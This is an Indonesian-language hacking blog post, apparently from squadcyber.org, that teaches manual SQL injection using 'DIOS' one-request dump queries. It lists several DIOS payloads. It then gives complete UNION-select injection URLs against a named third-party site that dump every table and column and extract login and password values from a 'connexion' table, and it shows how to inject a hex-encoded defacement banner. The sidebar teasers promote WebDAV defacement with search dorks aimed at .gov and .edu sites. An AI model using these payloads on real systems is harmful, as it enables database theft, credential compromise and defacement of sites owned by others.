Skip to main content

Sqli Manual With DIOS

squadcyber.org - DIOS (Dump In One Shoot) yang artinya kita bisa Dump / mengeluarkan isi database dengan 1 kali request, pertama kali di perkenalkan oleh Profexer (rdot.org) lalu dikembangkan oleh Dr.z3r0 ,M@dbl00d ,Zen Javanicus (securityidiots.com) ,MakMan ,dan temen2 injector lainnya.


DIOS cheatsheet

Query untuk Dump Semua Tabel dan Kolom


Profexer Query

(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

Dr.z3r0 Query

(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.coLumns )where(@:=concat(@,0x3c6c693e,table_name,0x203a3a20,column_name))),@)))


Zen Query

make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

m@db100d Query

(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x203a3a20,2)),@,2))

pilih salah satu Query DIOS

Target :
http://www.icpconcepts.com/produit.php?id=55

step berikut nya order by / group by sprti old method manual sqli .
gw anggap kalian sudah bisa menemukan magic number...
Langsung replace column 21 / magic number nya dengan DIOS query
kita coba dump semua tabel dan kolom ::

http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),22,23,24,25,26,27,28,29,30--+


kan kita uda tahu nama tabel dan culumn name ,untuk dump / extrak data bgini ::
kita coba dump dari Tabel "connexion" column "id", "login" ,dan "passwd" ..
/! perhatikan baik2 query yg berubah. /

http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(select(@x)from(select(@x:=0x00),(select(0)from(connexion)where(@x:=concat+(@x,0x3c62723e,id,0x203a3a20,login,0x203a3a20,passwd))))x),22,23,24,25,26,27,28,29,30--+


#Nb

kalian bisa modif query nya :D
tambahin tag2 html/ sql function dalam concat()

contoh ::

http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(0x3C666F6E7420636F6C6F723D626C75653E3C623E496E6A6563746564204279205633726C75636869653C2F623E3C2F666F6E743E,0x3c62723e4461746162617365203a3a20,database(),0x3c62723e4d7953514c2056657273696f6e203a3a20,version(),0x3c62723e43757272656e742055736572203a3a20,user(),0x3c62723e2053796d6c696e6b203a3a20,@@Global.have_symlink,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),22,23,24,25,26,27,28,29,30--+


Tambahan ::
kita bs memasukkan tag2 html pada saat injeksi web..
seperti dll dengan syarat harus di convert dalam hex .lalu depannya dikasih 0x.
bentuk Hex ::
0x3C666F6E7420636F6C6F723D626C75653E3C623E496E6A6563746564204279205633726C75636869653C2F623E3C2F666F6E743E adalah Injected By V3rluchie
Dengan memakai tehnik ini kalian tidak perlu convert nama table, dan skaligus kita bisa tahu semua tabel dan kolom secara bersamaan :)

Tehnik Modern Manual SQLi yg simple dan cepat . Ketika Automatic Tool tdk Mampu , Manual mungkin bisa membantu .

Comments

Popular posts from this blog

Cara Install WPScan di Windows

squadcyber.org - WPScan adalah tool untuk menguji kerentanan sebuah website yang menggunakan CMS Wordpress, tapi keterangan yang ditulis di wpscan.org menerangkan bahwa WPScan hanya bisa di jalankan pada platform Linux dan tidak mendukung sitem operasi Windows. Namun kini WPScan tidak hanya bisa berjalan pada Os Linux, Pengguna Windows pun bisa menggunakannya juga, bagaimana cara nya? simak tutorial berikut. Download Bahan - Bahan nya Download   Ruby 2.3.3    |   alternative  link Download   DevKit 4.52    |   alternative  link Download   Libcurl.dll    |   alternative  link Download   WPScan 2.9.2    |   alternative  link Cara Install WPScan di Windows Install Ruby Buka ruby installer tadi yang sudah di download, pilih bahasa nya dan pilih accept the license, lalu klik next Pilih dimana kalian akan install ruby nya, dan centang semua nya lalu klik inst...

Deface WEBDAV di Android

Hai guys... kali ini gw mau bagiin tutor depes webdav di android lewat termux buat user android yg kere hore nggak punya pc kek gw gini :v jadi gausah bingung2 main ke warnet buat depes webdav :v tapi kelemahannya ini ga bisa mass exploit...jadi harus satu2 :'v langsung sadja download termux di playstore dulu ea :v dork : intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:edu intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:gov intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:YOURCOUNTRY (misal: my, us, th. dll) inurl:webdav inurl:.com.x/*.asp inurl:.edu.x/*.asp inurl:.gov.x/*.asp inurl:.net.x/*.asp inurl:.org.x/*.asp tutorial : buka termux nya....ketik kode di bawah ini   $ apt update && apt upgrade   $ apt install python2   $ pip2 install urllib3 chardet certifi idna requests   $ apt install openssl curl   $ pkg install libcurl    $ mkdir webdav ...

viSQL Scan SQL Vulnerability di Termux

Hay guys.. Kali ini gw bakal bagiin tool viSQL Scan SQL Vulnerability . Apa itu viSQL ? viSQL adalah suatu tools untuk meng-explotasi yang retan terhadap suatu pengujian website atau bisa disebut suatu scanner SQL vlunerability pada suatu situs target dan situs di server yaitu viSQL ini. dan viSQL ini terbuat dari bahasa pemrograman python2. Cara Install viSQL di Termux    $ apt-get update && apt-get upgrade    $ apt-get install git    $ apt-get install python2    $ git clone https://github.com/blackvkng/viSQL    $ cd viSQL    $ chmod 777 viSQL.py Dan untuk menjalankan nya kalian bisa melihat pada bagian help dengan mengetik    $ python2 viSQL.py -h Sekian dari gw... Semoga bermanfaat ^_^ Kalo masih bingung komen di bawah ea